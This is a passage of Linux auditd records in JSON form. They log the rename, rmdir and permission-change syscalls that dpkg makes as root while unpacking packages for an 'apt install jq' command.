"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.985:669",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f70",
"0x556ebaf26ed0",
"0x1",
"0x0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/man/man1/",
"inode": 7747,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/share/man/man1/",
"inode": 7747,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/usr/share/man/man1/jq.1.gz.dpkg-new",
"inode": 7935,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/usr/share/man/man1/jq.1.gz",
"inode": 7935,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.985:670",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f70",
"0x556ebaf26ed0",
"0x556ebaf26ed0",
"0x0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/jq/",
"inode": 808432,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/share/doc/jq/",
"inode": 808432,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/usr/share/doc/jq/README.dpkg-new",
"inode": 808435,
"dev": "fd:00",
"mode": "0o120777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/usr/share/doc/jq/README",
"inode": 808435,
"dev": "fd:00",
"mode": "0o120777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.985:671",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f70",
"0x556ebaf26ed0",
"0x556ebaf26ed0",
"0x0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/jq/",
"inode": 808432,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/share/doc/jq/",
"inode": 808432,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/usr/share/doc/jq/changelog.Debian.gz.dpkg-new",
"inode": 808436,
"dev": "fd:00",
"mode": "0o120777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/usr/share/doc/jq/changelog.Debian.gz",
"inode": 808436,
"dev": "fd:00",
"mode": "0o120777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.985:672",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 91,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0xa",
"0x1a4",
"0x0",
"0x1b6"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 277192,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.989:673",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba59cec0",
"0x556eba4a8a50",
"0x556eba7a8600",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/info/",
"inode": 267112,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/info/",
"inode": 267112,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/info/jq.list-new",
"inode": 277192,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/info/jq.list",
"inode": 277192,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.993:674",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-20",
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba9334b0",
"0x556ebb16c32e",
"0x8",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/tmp.ci/",
"inode": 276984,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/tmp.ci/control",
"inode": 276990,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.993:675",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-20",
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba9334b0",
"0x556ebb16c366",
"0x8",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/tmp.ci/",
"inode": 276984,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/tmp.ci/md5sums",
"inode": 277185,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.993:676",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba9334b0",
"0x556eba45b580",
"0x556eba45b580",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/tmp.ci/",
"inode": 276984,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/info/",
"inode": 267112,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/tmp.ci/md5sums",
"inode": 277185,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/info/jq.md5sums",
"inode": 277185,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.001:677",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba29b7e0",
"0x556eba29b810",
"0x556eba29b82a",
"0x556eb8dc8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/updates/tmp.i",
"inode": 277191,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/updates/0009",
"inode": 277191,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.001:678",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1b6"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/",
"inode": 2,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.001:679",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1b6"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/",
"inode": 786435,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.001:680",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1b6"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/",
"inode": 786436,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.001:681",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1b6"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/",
"inode": 786435,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.001:682",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1b6"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/",
"inode": 786447,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.001:683",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1b6"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/",
"inode": 793993,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.001:684",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1b6"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/jq/",
"inode": 808432,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.001:685",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1b6"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/jq/",
"inode": 808432,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.001:686",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1b6"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/",
"inode": 786447,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
